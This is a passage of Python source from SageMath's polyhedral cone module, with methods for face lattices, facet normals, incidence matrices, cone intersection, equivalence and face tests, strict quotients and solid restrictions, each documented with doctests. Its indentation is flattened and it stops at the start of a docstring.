# This try...except tests whether ray lies in S;
# "ray in S" does not work because ray lies in a
# toric lattice and S is a "plain" vector space,
# and there is only a conversion (no coercion)
# between them as of Trac ticket #10513.
try:
S(ray)
subspace_rays.append(i)
except (TypeError, ValueError):
atom_to_ray.append(i)
def ConeFace(atoms, facets):
if facets:
rays = sorted([atom_to_ray[a] for a in atoms]
+ subspace_rays)
face = ConvexRationalPolyhedralCone(
ambient=self, ambient_ray_indices=rays)
# It may be nice if this functionality is exposed,
# however it makes sense only for cones which are
# thought of as faces of a single cone, not of a fan.
face._containing_cone_facets = facets
return face
else:
return self
# Obtain a modified version of the incidence matrix,
# with rows corresponding to rays in subspace removed.
mod_incidence_matrix = self.incidence_matrix()[atom_to_ray]
atom_to_facets = [row.nonzero_positions()
for row in mod_incidence_matrix.rows()]
facet_to_atoms = [column.nonzero_positions()
for column in mod_incidence_matrix.columns()]
self._face_lattice = lattice_from_incidences(
atom_to_facets, facet_to_atoms, ConeFace,
key = id(self))
else:
# Get face lattice as a sublattice of the ambient one
allowed_indices = frozenset(self._ambient_ray_indices)
L = DiGraph()
origin = \
self._ambient._face_lattice_function().bottom()
L.add_vertex(0) # In case it is the only one
dfaces = [origin]
faces = [origin]
face_to_index = {origin:0}
next_index = 1
next_d = 1 # Dimension of faces to be considered next.
while next_d < self.dim():
ndfaces = []
for face in dfaces:
face_index = face_to_index[face]
for new_face in face.facet_of():
if not allowed_indices.issuperset(
new_face._ambient_ray_indices):
continue
if new_face in ndfaces:
new_face_index = face_to_index[new_face]
else:
ndfaces.append(new_face)
face_to_index[new_face] = next_index
new_face_index = next_index
next_index += 1
L.add_edge(face_index, new_face_index)
faces.extend(ndfaces)
dfaces = ndfaces
next_d += 1
if self.dim() > 0:
# Last level is very easy to build, so we do it separately
# even though the above cycle could do it too.
faces.append(self)
for face in dfaces:
L.add_edge(face_to_index[face], next_index)
D = {i:f for i,f in enumerate(faces)}
L.relabel(D)
self._face_lattice = FinitePoset(L, faces, key = id(self))
return self._face_lattice
# Internally we use this name for a uniform behaviour of cones and fans.
_face_lattice_function = face_lattice
def faces(self, dim=None, codim=None):
r"""
Return faces of ``self`` of specified (co)dimension.
INPUT:
- ``dim`` -- integer, dimension of the requested faces;
- ``codim`` -- integer, codimension of the requested faces.
.. NOTE::
You can specify at most one parameter. If you don't give any, then
all faces will be returned.
OUTPUT:
- if either ``dim`` or ``codim`` is given, the output will be a
:class:`tuple` of :class:`cones <ConvexRationalPolyhedralCone>`;
- if neither ``dim`` nor ``codim`` is given, the output will be the
:class:`tuple` of tuples as above, giving faces of all existing
dimensions. If you care about inclusion relations between faces,
consider using :meth:`face_lattice` or :meth:`adjacent`,
:meth:`facet_of`, and :meth:`facets`.
EXAMPLES:
Let's take a look at the faces of the first quadrant::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.faces()
((0-d face of 2-d cone in 2-d lattice N,),
(1-d face of 2-d cone in 2-d lattice N,
1-d face of 2-d cone in 2-d lattice N),
(2-d cone in 2-d lattice N,))
sage: quadrant.faces(dim=1)
(1-d face of 2-d cone in 2-d lattice N,
1-d face of 2-d cone in 2-d lattice N)
sage: face = quadrant.faces(dim=1)[0]
Now you can look at the actual rays of this face... ::
sage: face.rays()
N(1, 0)
in 2-d lattice N
... or you can see indices of the rays of the original cone that
correspond to the above ray::
sage: face.ambient_ray_indices()
(0,)
sage: quadrant.ray(0)
N(1, 0)
Note that it is OK to ask for faces of too small or high dimension::
sage: quadrant.faces(-1)
()
sage: quadrant.faces(3)
()
In the case of non-strictly convex cones even faces of small
non-negative dimension may be missing::
sage: halfplane = Cone([(1,0), (0,1), (-1,0)])
sage: halfplane.faces(0)
()
sage: halfplane.faces()
((1-d face of 2-d cone in 2-d lattice N,),
(2-d cone in 2-d lattice N,))
sage: plane = Cone([(1,0), (0,1), (-1,-1)])
sage: plane.faces(1)
()
sage: plane.faces()
((2-d cone in 2-d lattice N,),)
TESTS:
Now we check that "general" cones whose dimension is smaller than the
dimension of the ambient space work as expected (see :trac:`9188`)::
sage: c = Cone([(1,1,1,3),(1,-1,1,3),(-1,-1,1,3)])
sage: c.faces()
((0-d face of 3-d cone in 4-d lattice N,),
(1-d face of 3-d cone in 4-d lattice N,
1-d face of 3-d cone in 4-d lattice N,
1-d face of 3-d cone in 4-d lattice N),
(2-d face of 3-d cone in 4-d lattice N,
2-d face of 3-d cone in 4-d lattice N,
2-d face of 3-d cone in 4-d lattice N),
(3-d cone in 4-d lattice N,))
We also ensure that a call to this function does not break
:meth:`facets` method (see :trac:`9780`)::
sage: cone = toric_varieties.dP8().fan().generating_cone(0)
sage: cone
2-d cone of Rational polyhedral fan in 2-d lattice N
sage: for f in cone.facets(): print(f.rays())
N(1, 1)
in 2-d lattice N
N(0, 1)
in 2-d lattice N
sage: len(cone.faces())
3
sage: for f in cone.facets(): print(f.rays())
N(1, 1)
in 2-d lattice N
N(0, 1)
in 2-d lattice N
"""
if dim is not None and codim is not None:
raise ValueError(
"dimension and codimension cannot be specified together!")
dim = self.dim() - codim if codim is not None else dim
if "_faces" not in self.__dict__:
self._faces = tuple(map(self._sort_faces,
self.face_lattice().level_sets()))
if dim is None:
return self._faces
else:
lsd = self.linear_subspace().dimension()
return self._faces[dim - lsd] if lsd <= dim <= self.dim() else ()
@cached_method
def facet_normals(self):
r"""
Return inward normals to facets of ``self``.
.. NOTE::
#. For a not full-dimensional cone facet normals will specify
hyperplanes whose intersections with the space spanned by
``self`` give facets of ``self``.
#. For a not strictly convex cone facet normals will be orthogonal
to the linear subspace of ``self``, i.e. they always will be
elements of the dual cone of ``self``.
#. The order of normals is random, but consistent with
:meth:`facets`.
OUTPUT:
- a :class:`~sage.geometry.point_collection.PointCollection`.
If the ambient :meth:`~IntegralRayCollection.lattice` of ``self`` is a
:class:`toric lattice
<sage.geometry.toric_lattice.ToricLatticeFactory>`, the facet normals
will be elements of the dual lattice. If it is a general lattice (like
``ZZ^n``) that does not have a ``dual()`` method, the facet normals
will be returned as integral vectors.
EXAMPLES::
sage: cone = Cone([(1,0), (-1,3)])
sage: cone.facet_normals()
M(0, 1),
M(3, 1)
in 2-d lattice M
Now let's look at a more complicated case::
sage: cone = Cone([(-2,-1,2), (4,1,0), (-4,-1,-5), (4,1,5)])
sage: cone.is_strictly_convex()
False
sage: cone.dim()
3
sage: cone.linear_subspace().dimension()
1
sage: lsg = (QQ^3)(cone.linear_subspace().gen(0)); lsg
(1, 1/4, 5/4)
sage: cone.facet_normals()
M(7, -18, -2),
M(1, -4, 0)
in 3-d lattice M
sage: [lsg*normal for normal in cone.facet_normals()]
[0, 0]
A lattice that does not have a ``dual()`` method::
sage: Cone([(1,1),(0,1)], lattice=ZZ^2).facet_normals()
(-1, 1),
( 1, 0)
in Ambient free module of rank 2
over the principal ideal domain Integer Ring
We correctly handle the degenerate cases::
sage: N = ToricLattice(2)
sage: Cone([], lattice=N).facet_normals() # empty cone
Empty collection
in 2-d lattice M
sage: Cone([(1,0)], lattice=N).facet_normals() # ray in 2d
M(1, 0)
in 2-d lattice M
sage: Cone([(1,0),(-1,0)], lattice=N).facet_normals() # line in 2d
Empty collection
in 2-d lattice M
sage: Cone([(1,0),(0,1)], lattice=N).facet_normals() # strictly convex cone
M(0, 1),
M(1, 0)
in 2-d lattice M
sage: Cone([(1,0),(-1,0),(0,1)], lattice=N).facet_normals() # half space
M(0, 1)
in 2-d lattice M
sage: Cone([(1,0),(0,1),(-1,-1)], lattice=N).facet_normals() # whole space
Empty collection
in 2-d lattice M
"""
cone = self._PPL_cone()
normals = []
for c in cone.minimized_constraints():
assert c.inhomogeneous_term() == 0
if c.is_inequality():
normals.append(c.coefficients())
M = self.dual_lattice()
normals = tuple(map(M, normals))
for n in normals:
n.set_immutable()
if len(normals) > 1:
# Sort normals if they are rays
if self.dim() == 2 and normals[0]*self.ray(0) != 0:
normals = (normals[1], normals[0])
else:
try: # or if we have combinatorial faces already
facets = self._faces[-2]
normals = set(normals)
sorted_normals = [None] * len(normals)
for i, f in enumerate(facets):
for n in normals:
if n*f.rays() == 0:
sorted_normals[i] = n
normals.remove(n)
break
normals = tuple(sorted_normals)
except AttributeError:
pass
return PointCollection(normals, M)
@cached_method
def facet_of(self):
r"""
Return *cones* of the ambient face lattice having ``self`` as a facet.
OUTPUT:
- :class:`tuple` of :class:`cones <ConvexRationalPolyhedralCone>`.
EXAMPLES::
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: octant.facet_of()
()
sage: one_face = octant.faces(1)[0]
sage: len(one_face.facet_of())
2
sage: one_face.facet_of()[1]
2-d face of 3-d cone in 3-d lattice N
While fan is the top element of its own cone lattice, which is a
variant of a face lattice, we do not refer to cones as its facets::
sage: fan = Fan([octant])
sage: fan.generating_cone(0).facet_of()
()
Subcones of generating cones work as before::
sage: one_cone = fan(1)[0]
sage: len(one_cone.facet_of())
2
"""
L = self._ambient._face_lattice_function()
H = L.hasse_diagram()
return self._sort_faces(
f for f in H.neighbors_out(L(self)) if is_Cone(f))
def facets(self):
r"""
Return facets (faces of codimension 1) of ``self``.
OUTPUT:
- :class:`tuple` of :class:`cones <ConvexRationalPolyhedralCone>`.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.facets()
(1-d face of 2-d cone in 2-d lattice N,
1-d face of 2-d cone in 2-d lattice N)
"""
return self.faces(codim=1)
@cached_method
def incidence_matrix(self):
r"""
Return the incidence matrix.
.. NOTE::
The columns correspond to facets/facet normals
in the order of :meth:`facet_normals`, the rows
correspond to the rays in the order of
:meth:`rays`.
EXAMPLES::
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: octant.incidence_matrix()
[0 1 1]
[1 0 1]
[1 1 0]
sage: halfspace = Cone([(1,0,0), (0,1,0), (-1,-1,0), (0,0,1)])
sage: halfspace.incidence_matrix()
[0]
[1]
[1]
[1]
[1]
TESTS::
sage: halfspace.incidence_matrix().is_immutable()
True
Check that the base ring is ``ZZ``, see :trac:`29840`::
sage: halfspace.incidence_matrix().base_ring()
Integer Ring
"""
normals = self.facet_normals()
incidence_matrix = matrix(ZZ, self.nrays(),
len(normals), 0)
for Hindex, normal in enumerate(self.facet_normals()):
for Vindex, ray in enumerate(self.rays()):
if normal*ray == 0:
incidence_matrix[Vindex, Hindex] = 1
incidence_matrix.set_immutable()
return incidence_matrix
def intersection(self, other):
r"""
Compute the intersection of two cones.
INPUT:
- ``other`` - :class:`cone <ConvexRationalPolyhedralCone>`.
OUTPUT:
- :class:`cone <ConvexRationalPolyhedralCone>`.
Raises ``ValueError`` if the ambient space dimensions are not
compatible.
EXAMPLES::
sage: cone1 = Cone([(1,0), (-1, 3)])
sage: cone2 = Cone([(-1,0), (2, 5)])
sage: cone1.intersection(cone2).rays()
N(-1, 3),
N( 2, 5)
in 2-d lattice N
It is OK to intersect cones living in sublattices of the same ambient
lattice::
sage: N = cone1.lattice()
sage: Ns = N.submodule([(1,1)])
sage: cone3 = Cone([(1,1)], lattice=Ns)
sage: I = cone1.intersection(cone3)
sage: I.rays()
N(1, 1)
in Sublattice <N(1, 1)>
sage: I.lattice()
Sublattice <N(1, 1)>
But you cannot intersect cones from incompatible lattices without
explicit conversion::
sage: cone1.intersection(cone1.dual())
Traceback (most recent call last):
...
ValueError: 2-d lattice N and 2-d lattice M
have different ambient lattices!
sage: cone1.intersection(Cone(cone1.dual().rays(), N)).rays()
N(3, 1),
N(0, 1)
in 2-d lattice N
"""
if self._ambient is other._ambient:
# Cones of the same ambient cone or fan intersect nicely/quickly.
# Can we maybe even return an element of the cone lattice?..
# But currently it can be done only for strictly convex cones.
ambient_ray_indices = tuple(r for r in self._ambient_ray_indices
if r in other._ambient_ray_indices)
# type(self) allows this code to work nicely for derived classes,
# although it forces all of them to accept such input
return type(self)(ambient=self._ambient,
ambient_ray_indices=ambient_ray_indices)
# Generic (slow) intersection, returning a generic cone.
p = C_Polyhedron(self._PPL_cone())
p.add_constraints(other._PPL_cone().constraints())
return _Cone_from_PPL(p, self.lattice().intersection(other.lattice()))
def is_equivalent(self, other):
r"""
Check if ``self`` is "mathematically" the same as ``other``.
INPUT:
- ``other`` - cone.
OUTPUT:
- ``True`` if ``self`` and ``other`` define the same cones as sets of
points in the same lattice, ``False`` otherwise.
There are three different equivalences between cones `C_1` and `C_2`
in the same lattice:
#. They have the same generating rays in the same order.
This is tested by ``C1 == C2``.
#. They describe the same sets of points.
This is tested by ``C1.is_equivalent(C2)``.
#. They are in the same orbit of `GL(n,\ZZ)` (and, therefore,
correspond to isomorphic affine toric varieties).
This is tested by ``C1.is_isomorphic(C2)``.
EXAMPLES::
sage: cone1 = Cone([(1,0), (-1, 3)])
sage: cone2 = Cone([(-1,3), (1, 0)])
sage: cone1.rays()
N( 1, 0),
N(-1, 3)
in 2-d lattice N
sage: cone2.rays()
N(-1, 3),
N( 1, 0)
in 2-d lattice N
sage: cone1 == cone2
False
sage: cone1.is_equivalent(cone2)
True
TESTS:
A random cone is equivalent to itself::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8, max_rays=10)
sage: K.is_equivalent(K)
True
"""
if self is other:
return True
# TODO: Next check is pointless if cones and fans are made to be unique
if self.ambient() is other.ambient() and self.is_strictly_convex():
return self.ambient_ray_indices() == other.ambient_ray_indices()
if self.lattice() != other.lattice():
return False
return self._PPL_cone() == other._PPL_cone()
def is_face_of(self, cone):
r"""
Check if ``self`` forms a face of another ``cone``.
INPUT:
- ``cone`` -- cone.
OUTPUT:
- ``True`` if ``self`` is a face of ``cone``, ``False`` otherwise.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: cone1 = Cone([(1,0)])
sage: cone2 = Cone([(1,2)])
sage: quadrant.is_face_of(quadrant)
True
sage: cone1.is_face_of(quadrant)
True
sage: cone2.is_face_of(quadrant)
False
Being a face means more than just saturating a facet
inequality::
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: cone = Cone([(2,1,0),(1,2,0)])
sage: cone.is_face_of(octant)
False
TESTS:
Any cone is a face of itself::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8, max_rays=10)
sage: K.is_face_of(K)
True
"""
if self.lattice() != cone.lattice():
return False
if self._ambient is cone._ambient:
# Cones are always faces of their ambient structure, so
return self.rays().set().issubset(cone.rays().set())
if self.is_equivalent(cone):
return True
# Obviously False case
if self.dim() >= cone.dim(): # if == and face, we return True above
return False
# It remains to test whether self is a proper face of cone:
# 1) self must saturate at least one facet inequality
saturates = Poly_Con_Relation.saturates()
supporting_hyperplanes = Constraint_System()
for c in cone._PPL_cone().minimized_constraints():
rel = self._PPL_cone().relation_with(c)
if c.is_equality() and not rel.implies(saturates):
return False
if c.is_inequality() and rel.implies(saturates):
c_eq = (Linear_Expression(c.coefficients(),
c.inhomogeneous_term()) == 0)
supporting_hyperplanes.insert(c_eq)
if supporting_hyperplanes.empty():
return False
# 2) self must be a whole face, and not just a part of one
cone_face = C_Polyhedron(cone._PPL_cone())
cone_face.add_constraints(supporting_hyperplanes)
return cone_face == self._PPL_cone()
def is_isomorphic(self, other):
r"""
Check if ``self`` is in the same `GL(n, \ZZ)`-orbit as ``other``.
INPUT:
- ``other`` - cone.
OUTPUT:
- ``True`` if ``self`` and ``other`` are in the same
`GL(n, \ZZ)`-orbit, ``False`` otherwise.
There are three different equivalences between cones `C_1` and `C_2`
in the same lattice:
#. They have the same generating rays in the same order.
This is tested by ``C1 == C2``.
#. They describe the same sets of points.
This is tested by ``C1.is_equivalent(C2)``.
#. They are in the same orbit of `GL(n,\ZZ)` (and, therefore,
correspond to isomorphic affine toric varieties).
This is tested by ``C1.is_isomorphic(C2)``.
EXAMPLES::
sage: cone1 = Cone([(1,0), (0, 3)])
sage: m = matrix(ZZ, [(1, -5), (-1, 4)]) # a GL(2,ZZ)-matrix
sage: cone2 = Cone( m*r for r in cone1.rays() )
sage: cone1.is_isomorphic(cone2)
True
sage: cone1 = Cone([(1,0), (0, 3)])
sage: cone2 = Cone([(-1,3), (1, 0)])
sage: cone1.is_isomorphic(cone2)
False
TESTS::
sage: from sage.geometry.cone import classify_cone_2d
sage: classify_cone_2d(*cone1.rays())
(1, 0)
sage: classify_cone_2d(*cone2.rays())
(3, 2)
We check that :trac:`18613` is fixed::
sage: K = cones.trivial(0)
sage: K.is_isomorphic(K)
True
sage: K = cones.trivial(1)
sage: K.is_isomorphic(K)
True
sage: K = cones.trivial(2)
sage: K.is_isomorphic(K)
True
A random (strictly convex) cone is isomorphic to itself::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6, strictly_convex=True)
sage: K.is_isomorphic(K)
True
"""
if self.is_strictly_convex() and other.is_strictly_convex():
from sage.geometry.fan import Fan
return Fan([self]).is_isomorphic(Fan([other]))
if self.is_strictly_convex() ^ other.is_strictly_convex():
return False
raise NotImplementedError("isomorphism check for not strictly convex "
"cones is not implemented")
def is_simplicial(self):
r"""
Check if ``self`` is simplicial.
A cone is called **simplicial** if primitive vectors along its
generating rays form a part of a *rational* basis of the ambient
space.
OUTPUT:
- ``True`` if ``self`` is simplicial, ``False`` otherwise.
EXAMPLES::
sage: cone1 = Cone([(1,0), (0, 3)])
sage: cone2 = Cone([(1,0), (0, 3), (-1,-1)])
sage: cone1.is_simplicial()
True
sage: cone2.is_simplicial()
False
"""
return self.nrays() == self.dim()
@cached_method
def is_smooth(self):
r"""
Check if ``self`` is smooth.
A cone is called **smooth** if primitive vectors along its
generating rays form a part of an *integral* basis of the
ambient space. Equivalently, they generate the whole lattice
on the linear subspace spanned by the rays.
OUTPUT:
- ``True`` if ``self`` is smooth, ``False`` otherwise.
EXAMPLES::
sage: cone1 = Cone([(1,0), (0, 1)])
sage: cone2 = Cone([(1,0), (-1, 3)])
sage: cone1.is_smooth()
True
sage: cone2.is_smooth()
False
The following cones are the same up to a `SL(2,\ZZ)`
coordinate transformation::
sage: Cone([(1,0,0), (2,1,-1)]).is_smooth()
True
sage: Cone([(1,0,0), (2,1,1)]).is_smooth()
True
sage: Cone([(1,0,0), (2,1,2)]).is_smooth()
True
"""
if not self.is_simplicial():
return False
return self.rays().matrix().elementary_divisors() == [1] * self.nrays()
def is_empty(self):
"""
Return whether ``self`` is the empty set.
Because a cone always contains the origin, this method returns ``False``.
EXAMPLES::
sage: trivial_cone = cones.trivial(3)
sage: trivial_cone.is_empty()
False
"""
return False
def is_trivial(self):
"""
Checks if the cone has no rays.
OUTPUT:
- ``True`` if the cone has no rays, ``False`` otherwise.
EXAMPLES::
sage: c0 = cones.trivial(3)
sage: c0.is_trivial()
True
sage: c0.nrays()
0
"""
return self.nrays() == 0
is_compact = is_trivial
def is_strictly_convex(self):
r"""
Check if ``self`` is strictly convex.
A cone is called **strictly convex** if it does not contain any lines.
OUTPUT:
- ``True`` if ``self`` is strictly convex, ``False`` otherwise.
EXAMPLES::
sage: cone1 = Cone([(1,0), (0, 1)])
sage: cone2 = Cone([(1,0), (-1, 0)])
sage: cone1.is_strictly_convex()
True
sage: cone2.is_strictly_convex()
False
"""
if "_is_strictly_convex" not in self.__dict__:
convex = True
for gs in self._PPL_cone().minimized_generators():
if gs.is_line():
convex = False
break
self._is_strictly_convex = convex
return self._is_strictly_convex
@cached_method
def linear_subspace(self):
r"""
Return the largest linear subspace contained inside of ``self``.
OUTPUT:
- subspace of the ambient space of ``self``.
EXAMPLES::
sage: halfplane = Cone([(1,0), (0,1), (-1,0)])
sage: halfplane.linear_subspace()
Vector space of degree 2 and dimension 1 over Rational Field
Basis matrix:
[1 0]
TESTS:
The linear subspace of any closed convex cone can be identified
with the orthogonal complement of the span of its dual::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8)
sage: expected = K.dual().span().vector_space().complement()
sage: K.linear_subspace() == expected
True
"""
if self.is_strictly_convex():
return span([vector(QQ, self.lattice_dim())], QQ)
return span(self.lines(), QQ)
@cached_method
def lines(self):
r"""
Return lines generating the linear subspace of ``self``.
OUTPUT:
- :class:`tuple` of primitive vectors in the lattice of ``self``
giving directions of lines that span the linear subspace of
``self``. These lines are arbitrary, but fixed. If you do not care
about the order, see also :meth:`line_set`.
EXAMPLES::
sage: halfplane = Cone([(1,0), (0,1), (-1,0)])
sage: halfplane.lines()
N(1, 0)
in 2-d lattice N
sage: fullplane = Cone([(1,0), (0,1), (-1,-1)])
sage: fullplane.lines()
N(0, 1),
N(1, 0)
in 2-d lattice N
"""
lines = []
for g in self._PPL_cone().minimized_generators():
if g.is_line():
lines.append(g.coefficients())
N = self.lattice()
lines = tuple(map(N, lines))
for l in lines:
l.set_immutable()
return PointCollection(lines, N)
def plot(self, **options):
r"""
Plot ``self``.
INPUT:
- any options for toric plots (see :func:`toric_plotter.options
<sage.geometry.toric_plotter.options>`), none are mandatory.
OUTPUT:
- a plot.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.plot() # optional - sage.plot
Graphics object consisting of 9 graphics primitives
"""
# What to do with 3-d cones in 5-d? Use some projection method?
deg = self.lattice().degree()
tp = ToricPlotter(options, deg, self.rays())
# Modify ray labels to match the ambient cone or fan.
tp.ray_label = label_list(tp.ray_label, self.nrays(), deg <= 2,
self.ambient_ray_indices())
result = tp.plot_lattice() + tp.plot_generators()
# To deal with non-strictly convex cones we separate rays and labels.
result += tp.plot_ray_labels()
tp.ray_label = None
lsd = self.linear_subspace().dimension()
if lsd == 1:
# Plot only rays of the line
v = self.lines()[0]
tp.set_rays([v, -v])
if lsd <= 1:
result += tp.plot_rays()
# Modify wall labels to match the ambient cone or fan too.
walls = self.faces(2)
try:
ambient_walls = self.ambient().faces(2)
except AttributeError:
ambient_walls = self.ambient().cones(2)
tp.wall_label = label_list(tp.wall_label, len(walls), deg <= 2,
[ambient_walls.index(wall) for wall in walls])
tp.set_rays(self.ambient().rays())
result += tp.plot_walls(walls)
return result
def polyhedron(self):
r"""
Return the polyhedron associated to ``self``.
Mathematically this polyhedron is the same as ``self``.
OUTPUT:
- :class:`~sage.geometry.polyhedron.base.Polyhedron_base`.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.polyhedron()
A 2-dimensional polyhedron in ZZ^2 defined as the convex hull
of 1 vertex and 2 rays
sage: line = Cone([(1,0), (-1,0)])
sage: line.polyhedron()
A 1-dimensional polyhedron in ZZ^2 defined as the convex hull
of 1 vertex and 1 line
Here is an example of a trivial cone (see :trac:`10237`)::
sage: origin = Cone([], lattice=ZZ^2)
sage: origin.polyhedron()
A 0-dimensional polyhedron in ZZ^2 defined as the convex hull
of 1 vertex
"""
return Polyhedron(rays=self.rays(), vertices=[self.lattice()(0)])
def an_affine_basis(self):
r"""
Return points in ``self`` that form a basis for the affine hull.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.an_affine_basis()
Traceback (most recent call last):
...
NotImplementedError: this function is not implemented for unbounded polyhedra
sage: ray = Cone([(1, 1)])
sage: ray.an_affine_basis()
Traceback (most recent call last):
...
NotImplementedError: this function is not implemented for unbounded polyhedra
sage: line = Cone([(1,0), (-1,0)])
sage: line.an_affine_basis()
Traceback (most recent call last):
...
NotImplementedError: this function is not implemented for unbounded polyhedra
"""
return self.polyhedron().an_affine_basis()
@cached_method
def strict_quotient(self):
r"""
Return the quotient of ``self`` by the linear subspace.
We define the **strict quotient** of a cone to be the image of this
cone in the quotient of the ambient space by the linear subspace of
the cone, i.e. it is the "complementary part" to the linear subspace.
OUTPUT:
- cone.
EXAMPLES::
sage: halfplane = Cone([(1,0), (0,1), (-1,0)])
sage: ssc = halfplane.strict_quotient()
sage: ssc
1-d cone in 1-d lattice N
sage: ssc.rays()
N(1)
in 1-d lattice N
sage: line = Cone([(1,0), (-1,0)])
sage: ssc = line.strict_quotient()
sage: ssc
0-d cone in 1-d lattice N
sage: ssc.rays()
Empty collection
in 1-d lattice N
The quotient of the trivial cone is trivial::
sage: K = cones.trivial(0)
sage: K.strict_quotient()
0-d cone in 0-d lattice N
sage: K = Cone([(0,0,0,0)])
sage: K.strict_quotient()
0-d cone in 4-d lattice N
TESTS:
The strict quotient of any cone should be strictly convex::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K.strict_quotient().is_strictly_convex()
True
If the original cone is solid, then its strict quotient is proper::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6, solid=True)
sage: K.strict_quotient().is_proper()
True
The strict quotient of a strictly convex cone is itself::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6, strictly_convex=True)
sage: K.strict_quotient() is K
True
The complement of our linear subspace has the same dimension as
our dual, so the strict quotient cannot have a larger dimension
than our dual::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K.strict_quotient().dim() <= K.dual().dim()
True
The strict quotient is idempotent::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K1 = K.strict_quotient()
sage: K2 = K1.strict_quotient()
sage: K1 is K2
True
"""
if self.is_strictly_convex():
return self
L = self.lattice()
Q = L.base_extend(QQ) / self.linear_subspace()
# Maybe we can improve this one if we create something special
# for sublattices. But it seems to be the most natural choice
# for names. If many subcones land in the same lattice -
# that's just how it goes.
if is_ToricLattice(L):
S = ToricLattice(Q.dimension(), L._name, L._dual_name,
L._latex_name, L._latex_dual_name)
else:
S = ZZ**Q.dimension()
rays = ( Q(ray) for ray in self if not Q(ray).is_zero() )
quotient = Cone(rays, S, check=False)
quotient._is_strictly_convex = True
return quotient
@cached_method
def solid_restriction(self):
r"""
Return a solid representation of this cone in terms of a basis
of its :meth:`sublattice`.
We define the **solid restriction** of a cone to be a
representation of that cone in a basis of its own
sublattice. Since a cone's sublattice is just large enough to
hold the cone (by definition), the resulting solid restriction
:meth:`is_solid`. For convenience, the solid restriction lives
in a new lattice (of the appropriate dimension) and not actually
in the sublattice object returned by :meth:`sublattice`.
OUTPUT:
A solid cone in a new lattice having the same dimension as this
cone's :meth:`sublattice`.
EXAMPLES:
The nonnegative quadrant in the plane is left after we take its
solid restriction in space::
sage: K = Cone([(1,0,0), (0,1,0)])
sage: K.solid_restriction().rays()
N(0, 1),
N(1, 0)
in 2-d lattice N
The solid restriction of a single ray has the same
representation regardless of the ambient space::
sage: K = Cone([(1,0)])
sage: K.solid_restriction().rays()
N(1)
in 1-d lattice N
sage: K = Cone([(1,1,1)])
sage: K.solid_restriction().rays()
N(1)
in 1-d lattice N
The solid restriction of the trivial cone lives in a trivial space::
sage: K = cones.trivial(0)
sage: K.solid_restriction()
0-d cone in 0-d lattice N
sage: K = cones.trivial(4)
sage: K.solid_restriction()
0-d cone in 0-d lattice N
The solid restriction of a solid cone is itself::
sage: K = Cone([(1,1),(1,2)])
sage: K.solid_restriction() is K
True
TESTS:
The solid restriction of any cone is solid::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K.solid_restriction().is_solid()
True
If a cone :meth:`is_strictly_convex`, then its solid restriction
:meth:`is_proper`::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6, strictly_convex=True)
sage: K.solid_restriction().is_proper()
True
The solid restriction of a cone has the same dimension as the
original::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K.solid_restriction().dim() == K.dim()
True
The solid restriction of a cone has the same number of rays as
the original::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K.solid_restriction().nrays() == K.nrays()
True
The solid restriction of a cone has the same lineality as the
original::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: K.solid_restriction().lineality() == K.lineality()
True
The solid restriction of a cone has the same number of facets as
the original::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: len(K.solid_restriction().facets()) == len(K.facets())
True
"""
if self.is_solid():
return self
# Construct a NEW lattice ``S`` (of the appropriate dimension)
# to use. This works around the fact that it's difficult to
# work with sublattice objects. There are naming issues here
# similar to those in the strict_quotient() method.
L = self.lattice()
subL = self.sublattice()
S = ToricLattice(subL.dimension(), L._name,
L._dual_name, L._latex_name, L._latex_dual_name)
# We don't need to check if these rays are zero: they will all
# have at least one non-zero coordinate; otherwise they would
# lie outside of the span of our cone. And they don't, because
# they generate the cone.
rays = ( S(subL.coordinates(ray)) for ray in self )
return Cone(rays, lattice=S, check=False)
def _split_ambient_lattice(self):
r"""
Compute a decomposition of the ``N``-lattice into `N_\sigma`
and its complement isomorphic to `N(\sigma)`.
You should not call this function directly, but call
:meth:`sublattice` and :meth:`sublattice_complement` instead.
EXAMPLES::
sage: c = Cone([ (1,2) ])
sage: c._split_ambient_lattice()
sage: c._sublattice
Sublattice <N(1, 2)>
sage: c._sublattice_complement
Sublattice <N(0, 1)>
Degenerate cases::
sage: C2_Z2 = Cone([(1,0),(1,2)])
sage: C2_Z2._split_ambient_lattice()
sage: C2_Z2._sublattice
Sublattice <N(1, 0), N(0, 1)>
Trivial cone::
sage: trivial_cone = cones.trivial(3)
sage: trivial_cone._split_ambient_lattice()
sage: trivial_cone._sublattice
Sublattice <>
sage: trivial_cone._sublattice_complement
Sublattice <N(1, 0, 0), N(0, 1, 0), N(0, 0, 1)>
"""
N = self.lattice()
n = N.dimension()
basis = self.rays().basis()
r = len(basis)
Nsigma = matrix(ZZ, r, n, ( N.coordinates(v) for v in basis ))
D, U, V = Nsigma.smith_form() # D = U*N*V <=> N = Uinv*D*Vinv
basis = (V.inverse() * N.basis_matrix()).rows()
# spanned lattice N_sigma
self._sublattice = N.submodule_with_basis(basis[:r])
# complement to the spanned lattice, isomorphic to N(sigma)
self._sublattice_complement = N.submodule_with_basis(basis[r:])
def sublattice(self, *args, **kwds):
r"""
The sublattice spanned by the cone.
